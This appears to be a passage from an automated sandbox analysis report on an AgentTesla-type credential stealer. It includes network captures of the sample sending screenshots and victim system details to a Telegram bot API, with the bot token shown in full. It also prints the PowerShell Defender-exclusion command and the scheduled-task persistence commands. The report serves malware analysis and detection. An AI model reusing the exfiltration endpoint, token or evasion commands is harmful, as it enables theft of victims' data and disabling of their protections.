                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:37:12 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:37:12 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:37:12 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:37:12 UTC1565OUTData Raw: ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 27 ff 00 8f 79 3f dd 3f ca be 79 af a0 e6 9a 23 04 80 48 84 95 3f c4 3d 2b e7 ca b8 99 cc 2b 73 4c f1 24 f6 76 3f 60 b9 b5 82 fe cf 3b 96 1b 85 c8 53 ea 0f 6f c2 b0 e8 aa 20 dc d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 3a 28 a0 02 8a 28 a6 01 5a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33
                                                                  Data Ascii: }z(}z(}z(}z(}z(}z(}'y??y#H?=++sL$v?`;So I=-`p:((Z>'..V/1q\:3
                                                                  2024-04-19 17:37:12 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 38 31 62 62 65 30 35 66 33 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc60a81bbe05f3--
                                                                  2024-04-19 17:37:12 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:37:13 UTC1482INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:37:13 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1093
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3456,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548233,"document":{"file_name":"user-618321 2024-04-19 19-37-11.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg2AZiKrybobC6ULtXlzrBACSc0Ks28AAsQXAAKLUhlRJbjNWIWHTcMBAAdtAAM0BA","file_unique_id":"AQADxBcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg2AZiKrybobC6ULtXlzrBACSc0Ks28AAsQXAAKLUhlRJbjNWIWHTcMBAAdtAAM0BA","file_unique_id":"AQADxBcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINgGYiq8m6GwulC7V5c6wQAknNCrNvAALEFwACi1IZUSW4zViFh03DNAQ","file_unique_id":"AgADxBcAAotSGVE","file_size":66528},"caption":"New SC Recovered!\n\nTime: 04/19/2024 19:37:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  25192.168.2.549740149.154.167.220443
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-19 17:37:12 UTC262OUTPOST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3
                                                                  Host: api.telegram.org
                                                                  Content-Length: 67151
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  2024-04-19 17:37:12 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 38 31 62 62 65 30 35 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 31 30 35 35 38 34 39 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 38 31 62 62 65 30 35 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 31 39 2f 32 30 32 34 20 31 39 3a 33 37 3a 31 31 0a 55 73 65 72
                                                                  Data Ascii: -----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="chat_id"1210558492-----------------------------8dc60a81bbe05f3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 04/19/2024 19:37:11User
                                                                  2024-04-19 17:37:12 UTC16355OUTData Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14
                                                                  Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"|
                                                                  2024-04-19 17:37:12 UTC16355OUTData Raw: e7 92 7f df 22 9c aa aa 30 a0 01 e8 2b 4a 58 19 c6 a2 94 a4 ac 8c eb 66 b4 1d 19 c2 9c 5d e4 ad ad 85 a2 8a 2b d5 3e 78 28 a2 8a 00 b5 a5 b2 a6 a9 6a cc 42 a8 95 49 24 e0 01 9a ee 3e dd 67 ff 00 3f 70 7f df c5 ff 00 1a f3 da 2b 8e be 17 db 4b 9a f6 3d 0c 2e 3b ea f0 70 e5 be bd cf 42 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a 4f b7 d9 7f cf e5 bf fd fd 5f f1 af 3e a2 b0 fe cf fe f7 e1 ff 00 04 e9 fe d5 fe e7 e3 ff 00 00 ea 7c 4f 75 6d 36 9a 89 0d c4 52 37 9a 0e 11 c1 38 c1 f4 ae 56 8a 2b b3 0f 47 d8 c7 96 f7 38 31 58 8f ac 4d 4a d6 d0 28 a2 8a dc e6 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51
                                                                  Data Ascii: "0+JXf]+>x(jBI$>g?p+K=.;pB}[O_>|Oum6R78V+G81XMJ(((JZ((((((QEJ)hZJ(JZJQE0(ZJQ
                                                                  2024-04-19 17:37:12 UTC16355OUTData Raw: d9 f2 82 51 45 14 00 57 49 e0 bf f9 06 dd 7f d7 d3 ff 00 25 ae 6e ba 4f 05 ff 00 c8 36 eb fe be 9f f9 2d 79 79 8f d8 f9 9f 41 92 fc 35 7d 17 e6 6f 4b 22 43 13 cb 23 05 44 05 98 9e c0 57 19 a1 eb 31 5a de de 5e cc 9f ba bb 72 ec 63 52 4c 58 27 01 bb 73 9a d6 d5 34 7b ed 57 50 29 3c 81 6c 43 02 30 e7 ee 80 32 02 fa 93 9e 4e 6b 71 21 8a 38 04 09 1a 88 82 ed 09 8e 31 e9 5e 3b 52 9c ae b4 b1 f4 d0 9d 2a 14 9c 5f bc e5 bd ba 2f f3 ff 00 22 b5 96 a7 6d 7b 2b c3 19 75 95 14 31 49 10 a9 c1 e8 7d c5 73 3e 2a ff 00 91 8a 3f fa f5 1f fa 19 ae ae da c6 d2 d1 99 ad ad a2 85 9b ef 14 40 33 5c a7 8a bf e4 62 8f fe bd 47 fe 86 6b a2 85 fd a4 2f dc e1 c4 f2 7b 1a bc 9b 72 bd fe 46 65 14 51 5f 48 7c 38 51 45 14 00 51 45 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 68 a0 04 a2 96 8a
                                                                  Data Ascii: QEWI%nO6-yyA5}oK"C#DW1Z^rcRLX's4{WP)<lC02Nkq!81^;R*_/"m{+u1I}s>*?@3\bGk/{rFeQ_H|8QEQE((J)h
                                                                  2024-04-19 17:37:12 UTC15447OUTData Raw: a2 8a 29 80 51 45 14 00 51 45 14 00 94 51 45 03 0a 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 25 14 51 40 05 14 51 40 c2 90 d2 f6 a4 a0 02 8a 28 a0 04 a2 8a 28 18 52 52 d2 50 01 45 14 50 02 51 4b 49 40 c2 8a 28 a0 02 92 8a 29 8c 28 a2 8a 00 4a 28 cd 26 68 18 b4 94 94 50 16 0c fb 52 66 8a 28 18 52 52 d2 50 01 49 4b 49 40 c2 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 a2 8a 06 21 a2 8a 28 00 a4 a5 a4 a0 61 49 4b 49 40 05 25 2d 14 14 25 14 52 50 08 5a 4a 28 a0 04 34 51 45 03 0a 4a 5a 4a 06 14 94 51 40 09 45 2d 25 03 0a 4a 5a 4a 06 14 94 51 40 05 25 2d 14 0c 4a 28 a2 81 85 25 14 94 00 b4 94 51 40 c3 8a 29 28 a0 02 8a 28 a0 62 51 45 14 0c 4a 28 a2 80 0a 28 a4 a6 30 fe 74 51 f9 50 69 0c 43 c7 34 51 45 30 13 f1 a3 8a 28 a0 61 49 c5 2d 27 14 80 3d e8 fa 51 45
                                                                  Data Ascii: )QEQEQEJZJ(QE%Q@Q@((RRPEPQKI@()(J(&hPRf(RRPIKI@(aIERRP0((!(aIKI@%-%RPZJ(4QEJZJQ@E-%JZJQ@%-J(%Q@)((bQEJ((0tQPiC4QE0(aI-'=QE
                                                                  2024-04-19 17:37:12 UTC1565OUTData Raw: ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 92 8a 8f cf 87 fe 7a a7 fd f4 28 f3 e1 ff 00 9e a9 ff 00 7d 0a 00 27 ff 00 8f 79 3f dd 3f ca be 79 af a0 e6 9a 23 04 80 48 84 95 3f c4 3d 2b e7 ca b8 99 cc 2b 73 4c f1 24 f6 76 3f 60 b9 b5 82 fe cf 3b 96 1b 85 c8 53 ea 0f 6f c2 b0 e8 aa 20 dc d4 fc 49 3d e5 8f d8 2d ad 60 b0 b3 ce e6 86 dd 70 18 fa 93 df f1 ac 3a 28 a0 02 8a 28 a6 01 5a f7 3e 27 d7 2e 2e a5 9f fb 56 f2 2f 31 cb f9 71 5c 3a a2 e4 e7 0a 33
                                                                  Data Ascii: }z(}z(}z(}z(}z(}z(}'y??y#H?=++sL$v?`;So I=-`p:((Z>'..V/1q\:3
                                                                  2024-04-19 17:37:12 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 30 61 38 31 62 62 65 30 35 66 33 2d 2d 0d 0a
                                                                  Data Ascii: -----------------------------8dc60a81bbe05f3--
                                                                  2024-04-19 17:37:13 UTC25INHTTP/1.1 100 Continue
                                                                  2024-04-19 17:37:13 UTC1485INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 19 Apr 2024 17:37:13 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 1096
                                                                  Connection: close
                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                  {"ok":true,"result":{"message_id":3457,"from":{"id":7177134832,"is_bot":true,"first_name":"bng_bot","username":"shanny1975_bot"},"chat":{"id":1210558492,"first_name":"kelv","last_name":"calin","type":"private"},"date":1713548233,"document":{"file_name":"user-618321 2024-04-19 19-37-11.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAg2BZiKryenFMv5U91fk_nGrBLzhTKoAAsUXAAKLUhlRHxsM4E3qAAHHAQAHbQADNAQ","file_unique_id":"AQADxRcAAotSGVFy","file_size":12508,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAg2BZiKryenFMv5U91fk_nGrBLzhTKoAAsUXAAKLUhlRHxsM4E3qAAHHAQAHbQADNAQ","file_unique_id":"AQADxRcAAotSGVFy","file_size":12508,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAINgWYiq8npxTL-VPdX5P5xqwS84UyqAALFFwACi1IZUR8bDOBN6gABxzQE","file_unique_id":"AgADxRcAAotSGVE","file_size":66528},"caption":"New SC Recovered!\n\nTime: 04/19/2024 19:37:11\nUser Name: user/618321\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 81.181.57.52","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:19:33:01
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\z1E-catalogSamples.exe"
                                                                  Imagebase:0xc00000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2102047965.000000000437F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                                                                  Imagebase:0x9a0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"
                                                                  Imagebase:0x8c0000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:19:33:03
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\Desktop\z1E-catalogSamples.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\z1E-catalogSamples.exe"
                                                                  Imagebase:0xd90000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4523979297.000000000042A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:19:33:04
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Imagebase:0xd60000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2140827658.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 71%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:19:33:04
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff6ef0c0000
                                                                  File size:496'640 bytes
                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"
                                                                  Imagebase:0x8c0000
                                                                  File size:187'904 bytes
                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vZkoWbol.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\vZkoWbol.exe"
                                                                  Imagebase:0x350000
                                                                  File size:704'512 bytes
                                                                  MD5 hash:2D9DFDB275D38155CBA293DC619430FA
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:12
                                                                  Start time:19:33:07
                                                                  Start date:19/04/2024
                                                                  Path:C:\Users\user\AppData\Roaming\vZkoWbol.exe
